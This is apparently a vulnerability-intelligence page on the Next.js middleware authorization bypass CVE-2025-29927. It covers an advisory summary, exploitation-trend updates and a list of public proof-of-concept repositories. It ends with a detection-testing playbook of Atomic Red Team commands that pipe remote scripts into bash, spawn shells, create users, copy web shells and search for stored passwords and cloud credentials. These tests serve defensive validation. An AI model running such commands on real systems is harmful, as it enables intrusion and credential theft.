CVE-2025-29927
Overview
This vulnerability is an authorization bypass affecting the middleware component of the Next.js React framework. The root cause lies in the improper handling of requests containing the x-middleware-subrequest header, which allows bypassing authorization checks implemented in middleware. The flaw exists in versions starting from 1.11.4 up to but not including 12.3.5, 13.5.9, 14.2.25, and 15.2.3, impacting the request validation logic within Next.js middleware.
Vulnerability Description
Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Impact
An unauthenticated attacker can exploit this vulnerability remotely by sending crafted HTTP requests containing the x-middleware-subrequest header to bypass authorization checks in Next.js middleware. This unauthorized access can lead to exposure of protected resources or functionality within the application without valid credentials. The attack requires network access but no user interaction or authentication, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). This can result in unauthorized data access or privilege escalation within affected Next.js applications.
Solution
Upgrade Next.js to one of the patched versions: 12.3.5, 13.5.9, 14.2.25, or 15.2.3 as detailed in the official GitHub security advisory (https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw). If immediate upgrading is not feasible, implement a network-level mitigation to block external requests containing the x-middleware-subrequest header from reaching the Next.js application. Refer to the vendor advisory and commit history for precise patch application instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Next.js framework arises from improper handling of authorization checks within middleware components. Specifically, when these checks are not adequately enforced, an attacker can exploit this weakness to bypass security measures that are intended to restrict access to sensitive resources. The flaw is particularly concerning because it affects multiple versions of the framework, allowing unauthorized users to potentially gain access to functionalities or data that should be protected. This issue is exacerbated by the framework's reliance on middleware for critical authorization processes, which, if misconfigured or inadequately implemented, can lead to significant security lapses.
Exploitation of this vulnerability can occur through various attack vectors. An attacker might craft a malicious request that includes the x-middleware-subrequest header, which is typically used for internal subrequests within the application. By manipulating this header, the attacker can trick the application into bypassing the intended authorization checks, thereby gaining unauthorized access to restricted areas of the application. This could lead to unauthorized data exposure, modification of application state, or even complete control over the application, depending on the privileges associated with the compromised session. The simplicity of this attack vector makes it particularly dangerous, as it does not require advanced technical skills, thus broadening the potential pool of attackers.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on Next.js for their web applications. Unauthorized access to sensitive data can lead to data breaches, which not only compromise user privacy but also result in significant financial and reputational damage. Businesses may face regulatory fines, loss of customer trust, and potential legal repercussions as a result of such breaches. Furthermore, the exploitation of this vulnerability could enable attackers to deploy malicious code or conduct further attacks within the compromised environment, leading to a cascading effect of security incidents. The high CVSS score of 9.1 underscores the critical nature of this vulnerability and the urgency for affected organizations to address it.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the patched versions of Next.js as soon as feasible. Regularly updating software components is a fundamental practice in maintaining security hygiene. In scenarios where immediate patching is not possible, it is advisable to implement network-level controls that block requests containing the x-middleware-subrequest header from reaching the application. This can be achieved through web application firewalls (WAFs) or other network security measures that inspect incoming traffic for malicious patterns. Additionally, conducting thorough security audits and code reviews can help identify and rectify any misconfigurations or weaknesses in the authorization logic within middleware components.
In conclusion, the vulnerability in the Next.js framework presents a significant threat to web applications built using this technology. Its potential for exploitation through simple attack vectors, combined with the severe implications of unauthorized access, necessitates immediate attention from organizations utilizing this framework. By adopting proactive detection and mitigation strategies, businesses can safeguard their applications against this and similar vulnerabilities, thereby enhancing their overall security posture and protecting sensitive data from malicious actors.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the Next.js authorization bypass vulnerability. Our telemetry indicates a significant surge in attack activity, accompanied by the emergence of several new proof-of-concept exploits and detection tools circulating within the threat landscape. Although the EPSS score shows a slight decline, this metric does not fully capture the increased adversary interest and operational activity observed. The proliferation of publicly available exploit code lowers the barrier to entry for threat actors, potentially broadening the pool of attackers capable of leveraging this vulnerability. This development elevates the overall threat level, underscoring the urgency for defenders to monitor for exploitation attempts closely and reassess their detection capabilities. The expanding exploit ecosystem and intensified attack volume collectively signal an increased risk to organizations running vulnerable Next.js versions, necessitating heightened vigilance despite the marginal EPSS decrease.
Update 2 — May 23, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-29927, accompanied by the emergence of additional proof-of-concept tools that have diversified the attack methodologies observed in the wild. Our telemetry indicates that threat actors are increasingly leveraging these publicly available exploits to bypass authorization controls within Next.js middleware, amplifying the potential impact on vulnerable environments. The slight uptick in the Exploit Prediction Scoring System (EPSS) score corroborates this trend, reflecting a modest but steady increase in the likelihood of exploitation. This evolving exploit landscape signifies a broadening of the attacker base, including less sophisticated actors who can now deploy these tools with minimal customization. Consequently, the threat level has escalated from elevated to critical, underscoring the urgency for defenders to intensify monitoring and detection efforts. The sustained growth in exploitation activity and tool availability heightens the risk of successful breaches, particularly in organizations that have yet to implement the recommended patches or mitigations.
Update 3 — July 04, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-29927, accompanied by the emergence of additional publicly available proof-of-concept exploits and enhanced scanning modules. Our telemetry indicates that adversaries are increasingly leveraging automated tools that exploit the x-middleware-subrequest header vulnerability, broadening the attacker base to include less technically skilled actors. This expansion in exploit accessibility significantly raises the probability of opportunistic attacks against vulnerable Next.js deployments that have not yet applied the necessary patches or mitigations. While the overall EPSS score remains near maximum, the upward trend in exploitation activity underscores a growing urgency for defenders to prioritize detection and monitoring efforts. Consequently, the threat level associated with this vulnerability has intensified, reflecting a higher risk of unauthorized access and potential data compromise within affected environments.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vercel | Next.js | All |
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | All |
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | All |
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
|
|
|
Vercel | Next.js | All |
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Next.js Middleware Authorization Bypass Scanner
auxiliary/scanner/http/nextjs_middleware_auth_bypass
|
Rachid Allam, Yasser Allam, Kenneth LaCroix | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Next.js Middleware 15.2.2 - Authorization Bypass | kOaDT | webapps | multiple | - | View |
GitHub PoCs (123)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
aydinnyunus/CVE-2025-29927
CVE-2025-29927 Proof of Concept
|
aydinnyunus | 99 | 28 | 2025-03-23 | View |
|
AnonKryptiQuz/NextSploit
NextSploit is a command-line tool designed to detect and exploit CVE-2025-29927, a security flaw in Next.js
|
AnonKryptiQuz | 91 | 19 | 2025-03-28 | View |
|
websecnl/CVE-2025-29927-PoC-Exploit
Proof-of-Concept for Authorization Bypass in Next.js Middleware
|
websecnl | 20 | 4 | 2025-03-23 | View |
|
lirantal/vulnerable-nextjs-14-CVE-2025-29927
|
lirantal | 14 | 8 | 2025-03-23 | View |
|
6mile/nextjs-CVE-2025-29927
A Nuclei template to detect CVE-2025-29927 the Next.js authentication bypass vulnerability
|
6mile | 19 | 3 | 2025-03-23 | View |
|
azu/nextjs-cve-2025-29927-poc
Next.js PoC for CVE-2025-29927
|
azu | 15 | 0 | 2025-03-23 | View |
|
UNICORDev/exploit-CVE-2025-29927
Exploit for CVE-2025-29927 (Next.js) - Authorization Bypass
|
UNICORDev | 11 | 2 | 2025-04-14 | View |
|
strobes-security/nextjs-vulnerable-app
CVE-2025-29927 lab
|
strobes-security | 6 | 7 | 2025-03-24 | View |
|
MuhammadWaseem29/CVE-2025-29927-POC
Authorization Bypass in Next.js Middleware
|
MuhammadWaseem29 | 9 | 3 | 2025-03-23 | View |
|
kOaDT/poc-cve-2025-29927
This repository contains a proof of concept (POC) and an exploit script for CVE-2025-29927, a critical vulnerability in ...
|
kOaDT | 7 | 3 | 2025-03-26 | View |
|
phoscoder/ghost-route
Ghost Route detects if a Next JS site is vulnerable to the corrupt middleware bypass bug (CVE-2025-29927)
|
phoscoder | 9 | 0 | 2025-03-25 | View |
|
gotr00t0day/CVE-2025-29927
Next.js Middleware Bypass Scanne
|
gotr00t0day | 8 | 1 | 2025-04-06 | View |
|
0rd1na1/CVE-2025-29927-Research
CVE-2025-29927에 대한 설명 및 리서치
|
0rd1na1 | 7 | 0 | 2025-03-27 | View |
|
KaztoRay/CVE-2025-29927-Research
CVE-2025-29927에 대한 설명 및 리서치
|
KaztoRay | 7 | 0 | 2025-03-27 | View |
|
fourcube/nextjs-middleware-bypass-demo
Demo for Next.js middleware bypass - CVE-2025-29927
|
fourcube | 5 | 0 | 2025-03-24 | View |
|
alihussainzada/CVE-2025-29927-PoC
PoC for CVE-2025-29927: Next.js Middleware Bypass Vulnerability. Demonstrates how x-middleware-subrequest can bypass aut...
|
alihussainzada | 5 | 0 | 2025-03-25 | View |
|
RoyCampos/CVE-2025-29927
CVE-2025-29927 Exploit Checker
|
RoyCampos | 4 | 1 | 2025-03-24 | View |
|
0xWhoknows/CVE-2025-29927
Async Python scanner for Next.js CVE-2025-29927. Uses aiohttp & aiofiles to efficiently process large URL lists, detect ...
|
0xWhoknows | 3 | 2 | 2025-03-24 | View |
|
luq0x/0xMiddleware
CVE-2025-29927: Next.js Middleware Exploit
|
luq0x | 3 | 2 | 2025-03-28 | View |
|
HoumanPashaei/CVE-2025-29927
This is a CVE-2025-29927 Scanner.
|
HoumanPashaei | 5 | 0 | 2025-04-29 | View |
|
Ademking/CVE-2025-29927
Next.js Middleware Authorization Bypass
|
Ademking | 4 | 1 | 2025-03-22 | View |
|
t3tra-dev/cve-2025-29927-demo
Next.js における認可バイパスの脆弱性 CVE-2025-29927 を再現するデモです。
|
t3tra-dev | 4 | 0 | 2025-03-23 | View |
|
TheresAFewConors/CVE-2025-29927-Testing
PowerShell script to test if a web app is vulnerable to CVE-2025-29927
|
TheresAFewConors | 2 | 2 | 2025-03-25 | View |
|
Eve-SatOrU/POC-CVE-2025-29927
CVE-2025-29927 Proof of Concept
|
Eve-SatOrU | 3 | 1 | 2025-03-24 | View |
|
c0dejump/CVE-2025-29927-check
script to check cve "CVE-2025-29927" while waiting to add it to HExHTTP
|
c0dejump | 3 | 1 | 2025-03-25 | View |
|
dedibagus/cve-2025-29927-poc
Authorization Bypass in Next.js Middleware
|
dedibagus | 0 | 3 | 2025-04-01 | View |
|
EQSTLab/CVE-2025-29927
Next.js middleware bypass exploit
|
EQSTLab | 2 | 0 | 2025-04-25 | View |
|
yugo-eliatrope/test-cve-2025-29927
|
yugo-eliatrope | 1 | 1 | 2025-03-26 | View |
|
nicknisi/next-attack
A demo of the CVE-2025-29927 vulnerability for a NebraskaJS lightning talk
|
nicknisi | 2 | 0 | 2025-03-26 | View |
|
lstudlo/nextjs-cve-demo
演示 Next.js 中的 Middleware 授權繞過漏洞 (CVE-2025-29927) 允許未經授權的用戶存取受保護的資訊。
|
lstudlo | 2 | 0 | 2025-05-15 | View |
|
sermikr0/nextjs-middleware-auth-bypass
CVE-2025-29927
|
sermikr0 | 1 | 1 | 2025-09-23 | View |
|
liamromanis101/CVE-2025-29927-NextJS
PoC for testing CVE-2025-29927 for Next.js versions 11.x, 12.x <= 12.3.5, 13.x <= 13.5.9, 14.x <=14.2.25, 15.x <= 15.2.3
|
liamromanis101 | 1 | 1 | 2025-12-02 | View |
|
arvion-agent/next-CVE-2025-29927
CVE-2025-29927 Authorization Bypass in Next.js Middleware
|
arvion-agent | 2 | 0 | 2025-03-24 | View |
|
Nekicj/CVE-2025-29927-exploit
next.js CVE-2025-29927 vulnerability exploit
|
Nekicj | 2 | 0 | 2025-03-27 | View |
|
emadshanab/CVE-2025-29927
New nuclei CVE
|
emadshanab | 2 | 0 | 2025-03-26 | View |
|
Oyst3r1ng/CVE-2025-29927
Next.js Middleware Auth Bypass
|
Oyst3r1ng | 2 | 0 | 2025-03-24 | View |
|
lem0n817/CVE-2025-29927
Next.js 中间件授权绕过漏洞测试环境 (CVE-2025-29927)
|
lem0n817 | 2 | 0 | 2025-03-24 | View |
|
nocomp/CVE-2025-29927-scanner
python script for evaluate if you are vulnerable or not to next.js CVE-2025-29927
|
nocomp | 1 | 1 | 2025-03-27 | View |
|
kh4sh3i/CVE-2025-29927
CVE-2025-29927: Next.js Middleware Bypass Vulnerability
|
kh4sh3i | 2 | 0 | 2025-04-23 | View |
|
ferpalma21/Automated-Next.js-Security-Scanner-for-CVE-2025-29927
This script scans a list of URLs to detect if they are using **Next.js** and determines whether they are vulnerable to *...
|
ferpalma21 | 2 | 0 | 2025-03-29 | View |
|
pouriam23/Next.js-Middleware-Bypass-CVE-2025-29927-
|
pouriam23 | 2 | 0 | 2025-04-21 | View |
|
mhamzakhattak/CVE-2025-29927
|
mhamzakhattak | 1 | 0 | 2025-04-16 | View |
|
0xcucumbersalad/cve-2025-29927
|
0xcucumbersalad | 0 | 1 | 2025-03-25 | View |
|
kuzushiki/CVE-2025-29927-test
CVE-2025-29927の検証
|
kuzushiki | 1 | 0 | 2025-03-24 | View |
|
ricsirigu/CVE-2025-29927
A deliberately Next.js app, vulnerable to CVE-2025-29927, Authorization Bypass
|
ricsirigu | 1 | 0 | 2025-03-24 | View |
|
jmbowes/NextSecureScan
Next.js CVE-2025-29927 Vulnerability Scanner
|
jmbowes | 1 | 0 | 2025-03-27 | View |
|
m2hcz/PoC-for-Next.js-Middleware
> 🔓 Proof-of-Concept for a fictional Next.js middleware bypass (CVE-2025-29927) — craft sub-requests to test protected r...
|
m2hcz | 1 | 0 | 2025-03-27 | View |
|
alastair66/CVE-2025-29927
Next.js Middleware Bypass Vulnerability
|
alastair66 | 1 | 0 | 2025-04-01 | View |
|
rubbxalc/CVE-2025-29927
|
rubbxalc | 1 | 0 | 2025-04-29 | View |
|
olimpiofreitas/CVE-2025-29927-scanner
|
olimpiofreitas | 1 | 0 | 2025-05-03 | View |
|
kazuya256/next-js-auth-bypass
🔓 Next.js Auth Bypass Demo - Educational application demonstrating CVE-2025-29927 middleware authentication bypass vulne...
|
kazuya256 | 1 | 0 | 2025-07-06 | View |
|
iteride/CVE-2025-29927
|
iteride | 1 | 0 | 2025-09-21 | View |
|
Bongni/CVE-2025-29927
Reproduction and fix of the CVE-2025-29927 vulnerability.
|
Bongni | 1 | 0 | 2025-10-08 | View |
|
jeymo092/cve-2025-29927
|
jeymo092 | 0 | 1 | 2025-03-25 | View |
|
aleongx/CVE-2025-29927_Scanner
Este script verifica la vulnerabilidad CVE-2025-29927 en servidores Next.js, probando múltiples cargas en la cabecera x-...
|
aleongx | 0 | 1 | 2025-03-27 | View |
|
SugiB3o/vulnerable-nextjs-14-CVE-2025-29927
vulnerable-nextjs-14-CVE-2025-29927
|
SugiB3o | 0 | 1 | 2025-05-29 | View |
|
w2hcorp/CVE-2025-29927-PoC
Here is a simple but effective exploit for CVE-2025-29927.
|
w2hcorp | 1 | 0 | 2025-03-29 | View |
|
Kamal-418/Vulnerable-Lab-NextJS-CVE-2025-29927
|
Kamal-418 | 1 | 0 | 2025-03-30 | View |
|
DanielHallbro/CVE-2025-29927-Nextjs-Bypass-PoC
A Proof of Concept for CVE-2025-29927 demonstrating a middleware bypass in Next.js versions prior to 13.5.9
|
DanielHallbro | 1 | 0 | 2026-01-26 | View |
|
pixilated730/NextJS-Exploit-
CVE-2025-29927
|
pixilated730 | 1 | 0 | 2025-04-07 | View |
|
0xnxt1me/CVE-2025-29927
|
0xnxt1me | 1 | 0 | 2025-04-08 | View |
|
hujiaozhuzhu/CVE-2025-29927__Next.js
CVE-2025-29927 - Next.js漏洞测试工具
|
hujiaozhuzhu | 0 | 1 | 2026-04-02 | View |
|
moften/CVE-2025-29927_Next.js_Auth_Bypass
Next.js Auth Bypass PoC Edge Runtime Env Leak via Middleware Bug
|
moften | 1 | 0 | 2025-05-06 | View |
|
surajpandeyp/CVE-2025-29927
|
surajpandeyp | 0 | 0 | 2026-07-07 | View |
|
Fomovet/cve-2025-29927
POC for CVE-2025-29927
|
Fomovet | 0 | 0 | 2026-06-21 | View |
|
SwapnilDeshpande/cve-2025-29927-lab
Reproduction lab for CVE-2025-29927 — Next.js middleware authorization bypass (CVSS 9.1)
|
SwapnilDeshpande | 0 | 0 | 2026-06-10 | View |
|
gitgudKrish/cve-2025-29927-nextjs
|
gitgudKrish | 0 | 0 | 2026-05-20 | View |
|
bk-security/auth-header-trust-rules
Semgrep rules that flag header-trust auth bypass patterns (CVE-2025-29927 class). Companion to bk-security.github.io.
|
bk-security | 0 | 0 | 2026-05-12 | View |
|
s11s11/CVE-2025-29927
Demo of CVE-2025-29927 for secure programming class
|
s11s11 | 0 | 0 | 2025-08-17 | View |
|
Nayekah/Next.js-Proof-of-Concept
Some Proof-of-Concept (POCs) for CVE-2025-29927, CVE-2026-27978, and CVE-2026-29057 in Next.js.
|
Nayekah | 0 | 0 | 2026-04-25 | View |
|
TheWaterbug/alpr-dashboard-patches
Runtime patches for algertc/alpr-dashboard: async logger fix and CVE-2025-29927 nginx mitigation
|
TheWaterbug | 0 | 0 | 2026-04-24 | View |
|
shahin-shadow/nextjs-auth-bypass
Analysis and exploitation of a Next.js authorization bypass vulnerability (CVE-2025-29927)
|
shahin-shadow | 0 | 0 | 2026-04-04 | View |
|
kuyrathdaro/cve-2025-29927
|
kuyrathdaro | 0 | 0 | 2025-09-28 | View |
|
Si-Ni/CVE-2025-29927-Proof-of-Concept
Capture the Flag challenge: CVE-2025-29927 in combination with a command injection vulnerability
|
Si-Ni | 0 | 0 | 2026-02-01 | View |
|
Balajih4kr/cve-2025-29927
CVE-2025-29927 is a critical vulnerability in Next.js, a popular React-based web framework. The flaw exists in how the m...
|
Balajih4kr | 0 | 0 | 2025-04-05 | View |
|
sdrtba/CVE-2025-29927
|
sdrtba | 0 | 0 | 2025-09-20 | View |
|
maronnjapan/claude-create-CVE-2025-29927
|
maronnjapan | 0 | 0 | 2025-03-25 | View |
|
adjscent/vulnerable-nextjs-14-CVE-2025-29927
do not use. vulnerable
|
adjscent | 0 | 0 | 2025-09-17 | View |
|
pickovven/vulnerable-nextjs-14-CVE-2025-29927
|
pickovven | 0 | 0 | 2025-04-08 | View |
|
R3verseIN/Nextjs-middleware-vulnerable-appdemo-CVE-2025-29927
|
R3verseIN | 0 | 0 | 2025-08-19 | View |
|
JOOJIII/CVE-2025-29927
|
JOOJIII | 0 | 0 | 2025-04-01 | View |
|
furmak331/CVE-2025-29927
Critical vulnerability in next.js : Bypass middleware authentication
|
furmak331 | 0 | 0 | 2025-03-25 | View |
|
aleongx/CVE-2025-29927
Next.js Acceso no autorizado CVE-2025-29927
|
aleongx | 0 | 0 | 2025-03-26 | View |
|
Heimd411/CVE-2025-29927-PoC
|
Heimd411 | 0 | 0 | 2025-03-27 | View |
|
dante01yoon/CVE-2025-29927
Next.js CVE-2025-29927 demonstration
|
dante01yoon | 0 | 0 | 2025-03-29 | View |
|
0xb1lal/CVE-2025-29927
Next.js CVE-2025-29927 güvenlik açığı hakkında
|
0xb1lal | 0 | 0 | 2025-04-01 | View |
|
Gokul-Krishnan-V-R/cve-2025-29927
Next.js and the corrupt middleware...TRY TO HACK IT..!
|
Gokul-Krishnan-V-R | 0 | 0 | 2025-04-02 | View |
|
sn1p3rt3s7/NextJS_CVE-2025-29927
|
sn1p3rt3s7 | 0 | 0 | 2025-04-04 | View |
|
Grand-Moomin/Vuln-Next.js-CVE-2025-29927
|
Grand-Moomin | 0 | 0 | 2025-04-18 | View |
|
EarthAngel666/x-middleware-exploit
x-middleware exploit for next.js CVE-2023–46298 cache poisoning and CVE-2025-29927 bypass
|
EarthAngel666 | 0 | 0 | 2025-05-08 | View |
|
sagsooz/CVE-2025-29927
🔐 Python-based smart scanner for CVE-2025-29927 — Next.js middleware authentication bypass vulnerability. Detects meta r...
|
sagsooz | 0 | 0 | 2025-05-26 | View |
|
amitlttwo/Next.JS-CVE-2025-29927
|
amitlttwo | 0 | 0 | 2025-06-12 | View |
|
mickhacking/Thank-u-Next
CVE-2025-29927 PoC | Auth Bypass Exploit | Python Tool using httpx | Middleware Vulnerability | Ethical Hacking Toolkit
|
mickhacking | 0 | 0 | 2025-07-14 | View |
|
rgvillanueva28/vulnbox-easy-CVE-2025-29927
|
rgvillanueva28 | 0 | 0 | 2025-07-30 | View |
|
MKIRAHMET/CVE-2025-29927-PoC
This repository contains **research and analysis** related to CVE-2025-29927. It demonstrates safe, controlled testing...
|
MKIRAHMET | 0 | 0 | 2025-09-11 | View |
|
amalpvatayam67/day10-nextjs-middleware-lab
Next.js middleware auth-bypass lab (CVE-2025-29927 simulation)
|
amalpvatayam67 | 0 | 0 | 2025-09-23 | View |
|
dbwlsdnr95/CVE-2025-29927
|
dbwlsdnr95 | 0 | 0 | 2026-03-02 | View |
|
ticofookfook/poc-nextjs-CVE-2025-29927
|
ticofookfook | 0 | 0 | 2025-03-23 | View |
|
w3shinew/CVE-2025-29927
A touch of security
|
w3shinew | 0 | 0 | 2025-03-26 | View |
|
enochgitgamefied/NextJS-CVE-2025-29927
|
enochgitgamefied | 0 | 0 | 2025-04-16 | View |
|
Hirainsingadia/CVE-2025-29927
Next js middlewareauth Bypass
|
Hirainsingadia | 0 | 0 | 2025-04-28 | View |
|
yuzu-juice/CVE-2025-29927_demo
This repository is for educational and research purposes.
|
yuzu-juice | 0 | 0 | 2025-03-28 | View |
|
enochgitgamefied/NextJS-CVE-2025-29927-Docker-Lab
|
enochgitgamefied | 0 | 0 | 2025-05-23 | View |
|
sangrok-jeon/CVE-2025-29927-Nextjs-Analysis
CVE-2025-29927-Nextjs 분석 보고서
|
sangrok-jeon | 0 | 0 | 2026-03-17 | View |
|
Toddkk02/CVE-2025-29927
|
Toddkk02 | 0 | 0 | 2026-03-17 | View |
|
0xPb1/Next.js-CVE-2025-29927
|
0xPb1 | 0 | 0 | 2025-03-25 | View |
|
fahimalshihab/NextBypass
Next.js Middleware Authorization Bypass Tool (CVE-2025-29927)
|
fahimalshihab | 0 | 0 | 2025-04-03 | View |
|
serhalp/test-cve-2025-29927
Verify Next.js CVE-2025-29927 on Netlify not vulnerable
|
serhalp | 0 | 0 | 2025-03-22 | View |
|
YEONDG/nextjs-cve-2025-29927
vulnerable-nextjs-14-CVE-2025-29927
|
YEONDG | 0 | 0 | 2025-04-06 | View |
|
ValGrace/middleware-auth-bypass
CVE-2025-29927 ~ a poc of the next.js middleware authentication bypass
|
ValGrace | 0 | 0 | 2025-04-08 | View |
|
sahbaazansari/CVE-2025-29927
The POC for m6.fr website
|
sahbaazansari | 0 | 0 | 2025-07-27 | View |
|
iSee857/CVE-2025-29927
Next.Js 权限绕过漏洞(CVE-2025-29927)
|
iSee857 | 0 | 0 | 2025-03-24 | View |
|
elshaheedy/CVE-2025-29927-Sigma-Rule
Sigma Rule for CVE-2025–29927 Detection
|
elshaheedy | 0 | 0 | 2025-03-24 | View |
|
ayato-shitomi/WebLab_CVE-2025-29927
Next.js Auth Bypass Lab ‐ CVE-2025-29927
|
ayato-shitomi | 0 | 0 | 2025-03-30 | View |
|
darklotuskdb/nextjs-CVE-2025-29927-hunter
Next.js CVE-2025-29927 Hunter
|
darklotuskdb | 0 | 0 | 2025-04-11 | View |
|
ethanol1310/POC-CVE-2025-29927-
POC CVE-2025-29927
|
ethanol1310 | 0 | 0 | 2025-04-13 | View |
|
b4sh0xf/PoC-CVE-2025-29927
→ poc for CVE-2025-29927
|
b4sh0xf | 0 | 0 | 2025-07-29 | View |
|
metasploit403/cve-2025-29927-lab
Deliberately vulnerable Next.js application demonstrating CVE-2025-29927 (middleware-based auth bypass) for learning and...
|
metasploit403 | 0 | 0 | 2026-04-02 | View |
|
0xPThree/next.js_cve-2025-29927
|
0xPThree | 0 | 0 | 2025-03-25 | View |
|
Naveen-005/Next.Js-middleware-bypass-vulnerability-CVE-2025-29927
A basic proof of concept of the CVE-2025-29927 vulnerability that allows to bypass the middleware scripts.
|
Naveen-005 | 0 | 0 | 2025-04-02 | View |
|
l1uk/nextjs-middleware-exploit
Research on Next.js middleware vulnerability (CVE-2025-29927) allowing authorization bypass and potential exploits.
|
l1uk | 0 | 0 | 2025-04-09 | View |
|
Knotsecurity/CVE-2025-29927-NextJs-Middleware-Simulation
Simulates CVE-2025-29927, a critical Next.js vulnerability allowing attackers to bypass middleware authorization by expl...
|
Knotsecurity | 0 | 0 | 2025-04-16 | View |
|
zs1n/CVE-2025-29927
PoC | NextJS Middleware 15.2.2 - Authorization Bypass
|
zs1n | 0 | 0 | 2025-08-28 | View |
Threat Feed
26 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
